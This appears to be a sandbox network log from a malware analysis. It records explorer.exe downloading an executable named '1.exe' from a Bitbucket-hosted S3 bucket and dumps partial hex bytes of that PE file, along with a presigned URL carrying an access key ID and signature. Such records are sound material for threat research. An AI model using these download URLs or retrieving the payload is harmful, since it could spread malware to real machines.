                                                                                                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                        Server: nginx
                                                                                                                                                        X-Usage-Quota-Remaining: 999252.654
                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                        X-Usage-Request-Cost: 759.47
                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        X-B3-TraceId: a928887ce17babfc
                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                        X-Dc-Location: Micros
                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:59 GMT
                                                                                                                                                        X-Usage-User-Time: 0.022784
                                                                                                                                                        X-Usage-System-Time: 0.000000
                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/31872cda-a479-44e8-b865-70ba18aaec67/downloads/3d8e64d7-3a3a-4f85-bde4-fe88e5a8d088/1.exe?Signature=LYct25MsH9V1aszIuuA3S95qNtU%3D&Expires=1640659361&AWSAccessKeyId=AKIA6KOSE3BNA7WTAGHW&versionId=BtKtP2E0q4PQvFUo.dOlKBb5196B2WYw&response-content-disposition=attachment%3B%20filename%3D%221.exe%22
                                                                                                                                                        X-Served-By: cbf625c0b7d3
                                                                                                                                                        Expires: Tue, 28 Dec 2021 02:23:59 GMT
                                                                                                                                                        Content-Language: en
                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                        X-Static-Version: dfb18959be9c
                                                                                                                                                        X-Render-Time: 0.0418009757996
                                                                                                                                                        Connection: close
                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                        X-Request-Count: 4020
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Version: dfb18959be9c
                                                                                                                                                        X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                        Content-Length: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        3192.168.2.34985552.216.132.51443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        2021-12-28 02:23:59 UTC1055OUTGET /31872cda-a479-44e8-b865-70ba18aaec67/downloads/3d8e64d7-3a3a-4f85-bde4-fe88e5a8d088/1.exe?Signature=LYct25MsH9V1aszIuuA3S95qNtU%3D&Expires=1640659361&AWSAccessKeyId=AKIA6KOSE3BNA7WTAGHW&versionId=BtKtP2E0q4PQvFUo.dOlKBb5196B2WYw&response-content-disposition=attachment%3B%20filename%3D%221.exe%22 HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                        2021-12-28 02:24:00 UTC1055INHTTP/1.1 200 OK
                                                                                                                                                        x-amz-id-2: 6wiJAlsqrAYeD0EXWL2NbLVZS7rGSh866tSGtUMT3GLn3jjP7aoo2CN/oalNGODBx2dU55vOWec=
                                                                                                                                                        x-amz-request-id: 48SDW1KY0116WP7R
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:24:00 GMT
                                                                                                                                                        Last-Modified: Mon, 27 Dec 2021 20:38:28 GMT
                                                                                                                                                        ETag: "79e048656eb39ab34e3f83fe6535b0a4"
                                                                                                                                                        x-amz-version-id: BtKtP2E0q4PQvFUo.dOlKBb5196B2WYw
                                                                                                                                                        Content-Disposition: attachment; filename="1.exe"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                        Server: AmazonS3
                                                                                                                                                        Content-Length: 783360
                                                                                                                                                        Connection: close
                                                                                                                                                        2021-12-28 02:24:00 UTC1056INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 b7 bc 92 40 d6 d2 c1 40 d6 d2 c1 40 d6 d2 c1 2f a0 4c c1 51 d6 d2 c1 2f a0 78 c1 2a d6 d2 c1 49 ae 41 c1 43 d6 d2 c1 40 d6 d3 c1 fd d6 d2 c1 2f a0 79 c1 76 d6 d2 c1 2f a0 48 c1 41 d6 d2 c1 2f a0 4f c1 41 d6 d2 c1 52 69 63 68 40 d6 d2 c1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 af b5 dc 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ae 0a 00 00 26 09 00 00 00 00
                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$@@@/LQ/x*IAC@/yv/HA/OARich@PEL`&
                                                                                                                                                        2021-12-28 02:24:00 UTC1071INData Raw: 00 5c 00 74 00 79 00 70 00 6e 00 61 00 6d 00 65 00 2e 00 63 00 70 00 70 00 00 00 00 00 70 00 4e 00 6f 00 64 00 65 00 2d 00 3e 00 5f 00 4e 00 65 00 78 00 74 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 00 00 66 3a 5c 64 64 5c 76 63 74 6f 6f 6c 73 5c 63 72 74 5f 62 6c 64 5c 73 65 6c 66 5f 78 38 36 5c 63 72 74 5c 73 72 63 5c 6d 6c 6f 63 6b 2e 63 00 00 2e 2e 2e 00 41 73 73 65 72 74 69 6f 6e 20 46 61 69 6c 65 64 00 00 00 00 45 72 72 6f 72 00 00 00 57 61 72 6e 69 6e 67 00 bc 4a 40 00 b4 4a 40 00 a0 4a 40 00 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 44 65 62 75 67 20 4c 69 62 72 61 72 79 00 00 5f 43 72 74 44 62 67 52 65 70 6f 72 74 3a 20 53 74 72 69 6e 67 20 74 6f 6f 20 6c 6f 6e 67 20 6f 72 20 49 4f 20 45 72 72 6f 72 00 00 73 00
                                                                                                                                                        Data Ascii: \typname.cpppNode->_Next != NULLf:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c...Assertion FailedErrorWarningJ@J@J@Microsoft Visual C++ Debug Library_CrtDbgReport: String too long or IO Errors
                                                                                                                                                        2021-12-28 02:24:00 UTC1087INData Raw: 00 3c 89 40 00 38 89 40 00 2c 89 40 00 28 89 40 00 70 1b 40 00 24 89 40 00 20 89 40 00 1c 89 40 00 18 89 40 00 14 89 40 00 10 89 40 00 0c 89 40 00 08 89 40 00 04 89 40 00 00 89 40 00 fc 88 40 00 f8 88 40 00 f4 88 40 00 f0 88 40 00 ec 88 40 00 e8 88 40 00 e4 88 40 00 e0 88 40 00 dc 88 40 00 d8 88 40 00 d4 88 40 00 d0 88 40 00 cc 88 40 00 c8 88 40 00 c4 88 40 00 c0 88 40 00 bc 88 40 00 b8 88 40 00 b4 88 40 00 a8 88 40 00 9c 88 40 00 94 88 40 00 88 88 40 00 70 88 40 00 64 88 40 00 50 88 40 00 30 88 40 00 10 88 40 00 f0 87 40 00 d0 87 40 00 b0 87 40 00 8c 87 40 00 70 87 40 00 4c 87 40 00 2c 87 40 00 04 87 40 00 e8 86 40 00 d8 86 40 00 d4 86 40 00 cc 86 40 00 bc 86 40 00 98 86 40 00 90 86 40 00 84 86 40 00 74 86 40 00 58 86 40 00 38 86 40 00 10 86 40 00 e8 85
                                                                                                                                                        Data Ascii: <@8@,@(@p@$@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@p@d@P@0@@@@@@p@L@,@@@@@@@@@@t@X@8@@
                                                                                                                                                        2021-12-28 02:24:00 UTC1088INData Raw: 00 6f 00 64 00 65 00 5f 00 73 00 61 00 66 00 65 00 28 00 66 00 6e 00 29 00 20 00 3d 00 3d 00 20 00 5f 00 5f 00 49 00 4f 00 49 00 4e 00 46 00 4f 00 5f 00 54 00 4d 00 5f 00 41 00 4e 00 53 00 49 00 29 00 20 00 26 00 26 00 20 00 21 00 5f 00 74 00 6d 00 5f 00 75 00 6e 00 69 00 63 00 6f 00 64 00 65 00 5f 00 73 00 61 00 66 00 65 00 28 00 66 00 6e 00 29 00 29 00 29 00 29 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 78 00 38 00 36 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 6f 00 75 00 74 00 70 00 75 00 74 00 2e 00 63 00 00 00 28 00 73 00 74 00 72 00 65 00 61 00 6d 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 29 00 00 00
                                                                                                                                                        Data Ascii: ode_safe(fn) == __IOINFO_TM_ANSI) && !_tm_unicode_safe(fn))))f:\dd\vctools\crt_bld\self_x86\crt\src\output.c(stream != NULL)
                                                                                                                                                        2021-12-28 02:24:00 UTC1104INData Raw: 5d bc b6 47 a2 f0 bf 2b 1b 54 e3 f6 ce 46 9f 45 b0 83 24 d3 df 1f f2 80 b9 5a 34 8d 1e 1a df 6b 60 f9 42 d5 43 80 be 75 c1 8b b2 31 be a5 3e a3 3d 47 d8 d3 1c 52 2f 77 0f 9d 37 1c 5c 18 be 4c 32 71 6c 84 a7 d0 b1 ac 5b e3 0e fe 98 f0 84 21 b7 6b 60 b1 30 e2 a1 0b 49 7a b5 f2 49 39 d3 d0 f0 2e c5 dd 37 c9 bf 88 1b 1c 8c 7c 35 66 48 b8 f8 85 cc bd ea 83 97 3f 77 34 5f 8f 63 56 dd 3d bb 99 a3 9c e0 80 43 f8 0d a4 85 f3 5e bc da db a1 bc 01 73 fd f0 ac 27 89 05 08 11 ca 73 dc a3 dc 37 a7 2e 93 83 c2 34 88 f0 50 19 83 6d 26 5c 6c 70 97 f2 3d 48 f5 6c c6 39 43 87 cc bd 8c a1 f6 68 a9 ec 5e 69 27 df 76 ee cd b0 db 2c a9 3a bd 4d 3b 28 6e e9 24 e6 78 5b 96 f3 1c f5 1e 7e 6c e3 b7 03 e6 70 49 43 eb 3b 49 68 5b 95 71 3e 18 bc dd 88 83 04 c6 84 e9 80 d7 bd ad 93 00
                                                                                                                                                        Data Ascii: ]G+TFE$Z4k`BCu1>=GR/w7\L2ql[!k`0IzI9.7|5fH?w4_cV=C^s's7.4Pm&\lp=Hl9Ch^i'v,:M;(n$x[~lpIC;Ih[q>
                                                                                                                                                        2021-12-28 02:24:00 UTC1105INData Raw: 55 e9 3d 06 d8 ca bb 97 15 83 75 1f 13 5d 92 db 9a f5 43 75 d0 95 ad 40 ec a2 71 14 6b 87 f3 40 04 c2 b8 7d 56 3f 59 47 1b 71 be 8b 5d 21 36 61 21 3c c6 05 aa 0d 4e 51 fe 8c 9b 84 4b 67 0d 4b b8 79 5b 7d ba cd 0c 3b 62 a2 d5 c9 44 84 83 71 ce 6e 38 19 7f f6 79 83 21 64 16 08 3e b2 d3 ad dc c9 fa 3b 45 f2 89 22 ca 2d 53 4f ce 72 fb d9 13 1d a3 ac 47 49 bd c8 86 ae 6e cd c3 b8 21 05 15 e2 af d1 10 68 6f 51 80 86 87 bb f0 67 97 ed 5c 93 8c c6 36 06 05 9a 0e 0d 36 8b 78 1f 61 0d 4d a7 d8 90 a0 4d 99 b3 0f 81 c6 bd 52 7f e1 cf 0a 3c 9d 28 32 48 e0 97 5a 93 c7 37 87 11 78 ed ec 34 a4 8e 33 da 5c a0 b7 95 93 f9 aa 85 77 e7 93 e8 33 be 2d fd 44 af 96 92 ed 04 cd 24 90 bb 06 11 88 86 db d5 55 55 2b a8 52 16 ac 2e 3c 80 4f be 91 e8 9e a9 12 bb 6e bd 26 2b 9f 0b 82
                                                                                                                                                        Data Ascii: U=u]Cu@qk@}V?YGq]!6a!<NQKgKy[};bDqn8y!d>;E"-SOrGIn!hoQg\66xaMMR<(2HZ7x43\w3-D$UU+R.<On&+
                                                                                                                                                        2021-12-28 02:24:00 UTC1121INData Raw: e4 0d 31 d6 5a f3 f4 95 c0 ac c6 7a 0d 1d 93 92 3a aa e6 da 40 30 23 3b dc c4 b9 05 d4 7f bb c8 e0 47 a3 c7 c7 a4 43 8c 74 c7 9f 65 60 01 5a 66 f7 99 aa 5e 66 a9 65 e0 c7 f9 a2 da 03 9c 03 2e c8 38 75 4e 72 f0 00 32 91 04 7d 1c 6a 73 37 d3 84 de 74 04 64 94 cc 5e 22 75 c3 04 33 fe 6f 9c e7 0a 20 35 b1 60 c5 16 90 35 79 17 d2 2b 3e 30 45 d0 98 d2 46 21 4b ea 4f c5 8d 77 42 87 e6 67 87 8b 7d 2a 40 85 34 03 b7 51 41 63 cf 12 8c 4d 8c 54 ce d3 e4 8d f4 68 2e 1f 4c 3d 97 5c 72 27 9a af 61 03 c6 c6 70 d4 3f d3 93 5c b4 5e 3e ce 53 e3 99 f7 74 84 16 bd 35 50 6b eb 2e d4 f2 b4 36 e9 a2 ff da f2 d4 dc b1 4d 39 bf de 84 3e 60 61 d0 62 37 35 2d 9e 02 e0 d3 02 0e bc 6e 68 bd e6 37 31 02 92 fb 7c 8e 0f 60 e0 7b a8 48 b7 08 6f 17 13 ac 63 5e 3d 64 6c 02 47 65 9a 95 04
                                                                                                                                                        Data Ascii: 1Zz:@0#;GCte`Zf^fe.8uNr2}js7td^"u3o 5`5y+>0EF!KOwBg}*@4QAcMTh.L=\r'ap?\^>St5Pk.6M9>`ab75-nh71|`{Hoc^=dlGe
                                                                                                                                                        2021-12-28 02:24:00 UTC1122INData Raw: 05 86 79 0a c7 91 52 2f fa 4d 3d 00 2c 9b c6 60 9d e6 3e 30 1d a8 12 dd f2 66 ee 61 a0 f0 a4 bd b3 99 be 35 58 68 9d 62 68 13 ff 03 d3 e6 84 14 e4 14 44 f7 52 cd 0b 59 50 bf f7 1a 99 3e 1e 05 c7 07 a8 30 b2 2d 43 ef 16 ee 37 6b f7 c2 7f 57 a1 c6 4d b2 14 8f 08 20 12 49 2c 20 ed 3b 7d b8 26 2f eb 4e 75 2f 79 ea f9 46 53 ba 8f c7 2d 9a ed 2e f4 32 03 76 f6 9a 64 fa 0a c4 11 d7 9f 69 be dc ab 36 9e af 88 9e 24 42 44 0b 4d 62 d2 e5 90 2c 9d e5 b1 27 f2 55 49 d9 a6 fb 86 7b 85 bc 48 58 9d 9e 00 02 82 33 a4 b6 3b e5 0a 9c 7c 93 18 8e 71 2e da 34 c3 0e f7 97 8e e2 1e 70 fb 23 46 a9 10 28 ca 68 d3 dc 14 8f a0 c4 4d ba 14 2c 35 34 0a 4e e0 2e 1b 47 58 9a 5e cc a5 9e 02 04 86 f3 4e 86 93 14 bc 65 dc 6e dc c5 22 a8 07 ea 64 29 01 80 31 41 18 21 a3 4c ae bd 44 08 46
                                                                                                                                                        Data Ascii: yR/M=,`>0fa5XhbhDRYP>0-C7kWM I, ;}&/Nu/yFS-.2vdi6$BDMb,'UI{HX3;|q.4p#F(hM,54N.GX^Nen"d)1A!LDF
                                                                                                                                                        2021-12-28 02:24:00 UTC1138INData Raw: 87 22 ff 3f 64 e2 74 b4 6a 02 9a 8e 80 7c 49 da c3 b8 e0 3f ac 1e e9 bb 42 c3 df 14 fc 01 a8 c8 90 ff ac 90 6f 80 da e6 64 0b a5 b9 1c e2 f4 32 a7 a8 4b 50 cf 92 24 10 35 c2 df 3e 1c 57 4f ce e8 99 4c 79 89 fa 15 79 18 79 88 84 df 38 94 13 53 24 8d 81 e1 47 79 0f b1 4b 9f b5 bb d3 82 2f 10 30 4d 3a 50 46 2b 27 8d 0a e4 30 6c b4 ca f4 a9 59 11 a5 d4 b8 60 7e 0c b9 b1 ef 5f 41 70 5a ed 09 94 d0 71 05 d0 25 64 5a c1 1b e1 1b 39 8b 23 a1 43 d1 0d 2b 79 83 2f c5 76 5c 6f 81 df 9e f8 fb ee 76 ea 38 e0 00 0c 23 a8 be 0c 94 b8 b1 c5 8d 14 1a c2 63 5b d9 43 46 91 1e f5 c1 8b c7 af 31 c3 51 16 5a dd af 75 c8 5e 34 6e 47 59 07 81 dc 43 98 64 db 3a 3b 8a 90 1b 4f 3b 46 ec 6a f1 17 eb 12 06 ae 3c fc ca 85 ec 01 4b 78 39 45 78 3b ff 5e 09 7d a7 bd a8 78 03 c2 59 0b 9c
                                                                                                                                                        Data Ascii: "?dtj|I?Bod2KP$5>WOLyyy8S$GyK/0M:PF+'0lY`~_ApZq%dZ9#C+y/v\ov8#c[CF1QZu^4nGYCd:;O;Fj<Kx9Ex;^}xY
                                                                                                                                                        2021-12-28 02:24:00 UTC1139INData Raw: 0d 0a db 1d 16 05 7d cf ae 6e 37 10 8d 4b 58 78 83 be 32 a8 18 37 cd 96 de 7b 74 2e d0 6e 42 11 ce db ca cd 7b a8 bc da d4 9d a7 04 73 62 2d f2 cf 32 38 f6 26 f8 96 3a 68 8a ac 2a 88 10 18 f4 87 b0 19 db 5b 2d 6a fc ae 3d cf bb d2 34 50 54 e5 d8 c8 2a 57 53 8c 11 39 67 50 48 5a 9b 8a b0 1b 10 ac 97 cb e0 55 94 aa 5b c1 c5 b8 2e 33 c5 a3 62 a7 12 66 21 6b f0 c5 90 58 cb 37 c3 69 43 73 6b ef 86 ee 01 d4 13 38 c4 89 9f e2 fa e3 f0 2c b2 e5 f2 68 cf 62 90 54 5f e0 e3 0b fc ee 61 71 8d 9b ae ac 0e de 95 bb a7 0c 17 76 e0 e6 20 5e f4 39 0e d1 2e bb dd 04 52 a0 0d 5e 41 b1 34 23 e8 d9 9d b5 7f 74 c4 bf ba f4 09 47 c2 50 8c 2f 7b ae ea 26 ed ff e3 72 af cc 3e 4d b8 1d 26 a1 b2 cb 75 a5 b8 1e 54 17 ab 62 54 ba cb 75 6f 9d 37 bd d4 90 8c 77 11 84 9e c1 6c 62 03 80
                                                                                                                                                        Data Ascii: }n7KXx27{t.nB{sb-28&:h*[-j=4PT*WS9gPHZU[.3bf!kX7iCsk8,hbT_aqv ^9.R^A4#tGP/{&r>M&uTbTuo7wlb
                                                                                                                                                        2021-12-28 02:24:00 UTC1155INData Raw: 9b 00 61 fb a6 21 88 05 8d 9b b3 89 35 de d0 98 2f 2c cc 76 9c 13 aa e6 ae fd 75 45 1c d3 16 e0 c1 55 04 94 58 88 2f ba cd 3a bc 6b af 7b 13 a6 20 61 79 49 04 00 8d 03 1c 4e 09 71 d9 1c 2c f9 af 12 df d1 33 41 9f 01 e3 86 8c b3 62 37 be 7c 1a 3e 29 c5 8a 64 dc 31 af 3e 57 b0 3a ce cf f2 27 64 0a 26 47 56 59 ea fe 12 6e ec 54 67 54 e7 a5 f3 c9 78 b6 24 f1 a1 55 f4 03 61 06 36 1b 2d 85 ac 97 71 f2 0e 92 51 43 b0 10 6d d6 3a aa 3e d7 db 6a c9 b9 84 ca 20 72 cc fd 8a 23 a8 2d 7e 91 1e 00 fe c9 d6 92 02 d0 4e 5b 21 f9 a3 37 6b 8a fd a9 86 05 32 b8 f3 99 c6 ef 71 fc 4e 81 e5 8f 8d b3 87 bf 99 02 37 e9 b1 b6 86 42 42 81 01 0d 6c 0d 14 dc c3 97 ed c6 34 db 40 17 a3 33 26 5f 38 7d 4b a5 df 50 74 c5 ea 9a a3 c1 6f b0 02 a6 5b 9d 1b f7 f7 62 94 67 e2 f3 cc 32 f7 48
                                                                                                                                                        Data Ascii: a!5/,vuEUX/:k{ ayINq,3Ab7|>)d1>W:'d&GVYnTgTx$Ua6-qQCm:>j r#-~N[!7k2qN7BBl4@3&_8}KPto[bg2H
                                                                                                                                                        2021-12-28 02:24:00 UTC1156INData Raw: 7a d6 36 44 70 e0 12 37 7a 0d 9e 49 78 05 af ef 3b 1c c7 65 8f 3e d0 e7 36 dc be 3a 93 8e 32 9f 9c 43 1f 08 b0 48 85 b7 a8 57 53 49 1a 8c bc 7e c9 7f d1 e1 aa 8d 7b 5b 29 b4 ef 8c eb ab 32 be dc 30 6e 5b ac d0 ed 06 fa 10 9b da 76 66 f9 fd 61 05 c7 1d ce bf 29 93 00 bb e8 9c 44 b6 d2 24 a1 83 22 4d 9c d0 51 3c a9 49 17 65 69 81 70 c2 3e ae 59 dc 36 3b 93 8f 83 40 b9 7d f4 96 6f 9d c8 56 92 c0 1d 3d 9c 02 53 ad e1 49 01 84 6a ef 62 d0 0e 81 a1 0a 1a 75 2e e0 50 ff c8 86 02 f8 0e 06 ee e9 bb 68 82 a5 23 b8 ff 05 78 8d d0 55 fc 22 64 13 3a a2 ba 73 14 36 10 ac a0 ca a6 3e f8 b7 b1 03 3e 49 96 67 36 d1 b7 4a 0e 00 c6 23 cc 05 21 e9 c5 4b 0c d6 9b 27 2f da 8d 0e ef 60 fa 81 f0 7b c9 c8 07 70 c7 c7 65 fc 02 21 fa e1 67 f6 5e a5 b7 1e ec 29 67 a2 5c d8 08 1d be
                                                                                                                                                        Data Ascii: z6Dp7zIx;e>6:2CHWSI~{[)20n[vfa)D$"MQ<Ieip>Y6;@}oV=SIjbu.Ph#xU"d:s6>>Ig6J#!K'/`{pe!g^)g\
                                                                                                                                                        2021-12-28 02:24:00 UTC1172INData Raw: be ed 00 16 b6 99 78 b2 2b c1 e7 d3 3e 93 e8 e4 07 34 15 af 2f 4b 4b f4 0d b4 9d e6 ae 33 72 d3 b4 17 3e 6a 3e 58 bf 68 d7 e1 41 13 58 d4 6e c8 14 b6 d3 64 65 ec 12 e2 09 62 3e 0a 19 08 a8 84 95 9f 73 e0 41 ee 80 4c 1d a2 73 db 6f df cd a6 0c 5d 03 91 9c 54 ac 01 64 b5 aa d8 d7 6f 25 e5 e5 66 33 7b 86 3d f2 f0 9e 74 12 30 6f 23 d9 d3 89 fa df 0f 73 82 ec b4 90 5d 19 4d 41 4d e8 13 6b d3 ba 85 47 a2 c8 bf 3b 46 08 60 48 92 d3 e7 b6 8d ff 35 03 13 76 54 5b 29 83 11 67 dc 31 28 0a bd 40 5c 96 78 a7 21 61 53 72 e9 8a 3e fd a7 66 97 0b d4 25 53 26 96 51 1a ff 5e 40 12 bb 16 e6 dc 50 af 39 54 4f 21 a7 7f 3b 10 55 c3 55 6f 8d 76 8a b7 a9 93 51 2b 38 66 52 a6 17 8f 30 4c 8c db 66 6d d4 96 78 26 8c f2 c7 f3 d2 c5 e0 92 91 ec 9e 88 ca 77 82 07 47 77 48 cc a0 59 23
                                                                                                                                                        Data Ascii: x+>4/KK3r>j>XhAXndeb>sALso]Tdo%f3{=t0o#s]MAMkG;F`H5vT[)g1(@\x!aSr>f%S&Q^@P9TO!;UUovQ+8fR0Lfmx&wGwHY#
                                                                                                                                                        2021-12-28 02:24:00 UTC1173INData Raw: 29 39 a2 2f 11 c8 c6 cf 27 8f 02 e4 ad f2 ed df b2 59 84 3a b3 d8 7b 76 85 3c 33 07 5f 76 18 bb c2 83 24 d6 c2 04 1a 99 36 4b 3d 16 f8 32 06 24 2b d2 86 d5 13 36 f2 75 2d bb e6 91 f0 0d 67 f4 2f 82 5e 34 2d 73 6e eb c8 e5 7a 77 e2 dc 66 b9 9c d5 cd d5 92 30 d9 78 d6 d9 e3 17 ab 5a b7 2f 9c 12 4f f9 4e fa 9f 14 68 ce df c7 0d 09 02 57 98 2e 41 9f cf c4 d6 cb 1a c6 51 d4 fe 61 cf 6b b2 db 35 05 2b 8d 55 b7 fe ee c3 1b 54 58 7e c5 60 2f 6a 65 84 31 eb 41 0d b1 e1 fd 53 da 55 75 3b c8 85 ec 70 b5 ea 00 27 28 84 95 73 e7 4e 70 35 04 65 dd 1d 4f 56 9a f8 a5 7e 26 dd 68 b3 68 08 6e 53 4c 82 dd 8a 75 bf 92 64 e5 66 8e 97 c2 77 61 d8 7f a1 16 24 6e 79 33 28 c5 6b f3 35 67 0f a3 2d 81 08 31 4d 50 15 54 77 d2 80 e8 ba f1 78 ff dd 64 15 24 57 19 74 76 6c 58 40 18 ed
                                                                                                                                                        Data Ascii: )9/'Y:{v<3_v$6K=2$+6u-g/^4-snzwf0xZ/ONhW.AQak5+UTX~`/je1ASUu;p'(sNp5eOV~&hhnSLudfwa$ny3(k5g-1MPTwxd$WtvlX@
                                                                                                                                                        2021-12-28 02:24:00 UTC1189INData Raw: bd ee ad 68 a5 03 98 00 1e 07 4b fc a8 95 d3 a9 5f 08 8f 21 87 0e db 0b 2b 85 1c fb 47 5f 4b 02 5a 49 b4 77 6d 2a 26 1d 2f f3 6d e5 61 74 30 84 43 3c 78 70 85 09 1d 40 cd 0e 01 7a 3f 52 ad a5 bb b4 c7 a1 5c 48 32 86 d0 f8 20 f7 63 80 27 42 57 29 75 d1 f2 cb fd c2 ca 24 03 4b 4d 3d 5b 13 ce 42 d3 dc 31 42 2f c2 aa 43 46 ae 48 b3 df b2 7a a8 93 8c bf d2 15 0c 9c 65 71 86 68 cb f6 96 59 bc 58 54 ad 64 d5 e6 c4 70 04 a6 cc 88 88 ab 67 54 9b 07 6b 63 15 e8 38 d1 e9 71 79 28 b7 56 ca e5 4b 5e d8 15 55 56 fb af c5 31 3f 4f bb 79 6f 5d bb ee 9f 54 8a b0 f2 7a 52 c2 eb 5e f8 f9 61 1a 84 6d 9f 3d ce c3 fb d6 a0 af d8 ba fe e2 a9 eb 8d 5d 62 82 84 eb 54 bc 3c e1 7d 97 63 55 0a dc 66 63 3b 71 7e e2 b4 c5 83 9f 41 1e b2 54 1d ec 87 f7 2f b4 30 5d 50 f3 87 b0 18 ea c5
                                                                                                                                                        Data Ascii: hK_!+G_KZIwm*&/mat0C<xp@z?R\H2 c'BW)u$KM=[B1B/CFHzeqhYXTdpgTkc8qy(VK^UV1?Oyo]TzR^am=]bT<}cUfc;q~AT/0]P
                                                                                                                                                        2021-12-28 02:24:00 UTC1190INData Raw: 1e 11 80 8e 68 03 40 29 82 cf 1c ce d9 47 ce d8 85 8c a8 44 45 d7 ed f0 5e 6d 86 4d a0 a4 5b 6d ec d5 39 59 3b 93 39 5f f7 ed b6 be ac a5 d9 73 0e 7e 07 61 eb 9a 0f a8 2d 7f 63 ce a3 45 f4 81 2b 9e ad 29 c4 35 60 d1 23 31 65 c4 e0 42 ed 46 2c 76 64 9b 17 12 f7 c2 f7 f8 e9 57 f6 d2 bf b3 27 63 af b5 ff 69 da a0 b9 d3 9d 7a 42 c6 3c 20 73 c4 91 9b 12 66 28 f6 54 e9 49 51 bb c5 ae e9 14 d8 35 d8 da 65 3a dc d9 a6 ce 69 dc b4 ab 90 29 02 7b dd 15 06 6e a8 db b9 6c 45 73 71 ef 61 85 2c da a1 82 2f 17 b5 a3 2a f7 55 d5 69 d2 09 7f 70 ce 71 c6 ed 5d f7 fe e4 cf b5 d2 27 dc 0d 50 13 dc f7 f0 b0 e0 5e 32 c8 0b 1e 77 24 c7 fb e4 73 1f a9 36 85 06 99 d0 94 36 83 d1 46 47 7a ef bb 1a 11 ac 81 44 15 00 b8 33 78 7d 2c a1 2e a3 5c 33 05 0f 81 42 5c 35 00 d7 40 35 ce 9b
                                                                                                                                                        Data Ascii: h@)GDE^mM[m9Y;9_s~a-cE+)5`#1eBF,vdW'cizB< sf(TIQ5e:i){nlEsqa,/*Uipq]'P^2w$s66FGzD3x},.\3B\5@5
